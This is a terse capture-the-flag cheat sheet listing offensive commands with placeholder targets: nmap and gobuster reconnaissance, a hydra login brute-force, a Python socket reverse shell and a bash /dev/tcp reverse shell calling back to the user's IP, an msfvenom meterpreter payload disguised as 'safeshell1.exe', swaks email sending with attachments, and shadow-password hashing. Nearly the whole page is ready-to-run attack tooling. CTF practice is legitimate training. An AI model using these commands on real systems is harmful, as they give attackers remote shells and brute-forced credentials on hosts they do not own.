CTF Cheat Sheet

This Isn’t meant to be a pretty page, this is purely just a list of commands to help with CTF’s

Nmap Initial

nmap -sC -Pn -sV -p- -oN ./nmap/initial <TARGET_IP>

GoBuster

gobuster dir -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/ -x html,php,txt

#NOTE: This is to find the three specific extensions, amend this as needed

HYDRA – HTTP-POST

hydra -l <USER> -p <PASSWORD> <IP_ADDRESS> http-post-form "<LOGIN_PAGE>:<REQUEST_BODY>:<ERROR_MESSAGE>"
#NOTE -l & -p in lowercase require specific username or password, in uppercase a link to a dictionary

Shell Upgrade

export TERM=xterm
python -c 'import pty; pty.spawn("/bin/bash")'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Python Server

python3 -m http.server
or
python -m SimpleHTTPServer 
# For Python <2.7

Reverse Shell – Web Interface

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

MSFVenom Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=<your port> -f exe > safeshell1.exe

Add to Hosts with SUDO

echo "<IP> <ALIAS>" | sudo tee -a /etc/hosts

Bash Reverse Shell

bash -i >& /dev/tcp/<YOUR_IP>/9006 0>&1

SWAKS

swaks --to <TO_EMAIL> --from <FROM_EMAIL> --header "<SUBJECT>" --body "<MESSAGE_BODY>" --attach <ATTACHMENT> --server <IP>

Generate Shadow Passwords

perl -e "print crypt('<password>','\$6\$SALTsalt\$')"